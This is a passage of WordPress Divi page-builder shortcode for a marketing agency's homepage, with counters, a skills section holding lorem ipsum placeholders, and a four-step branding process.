background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column 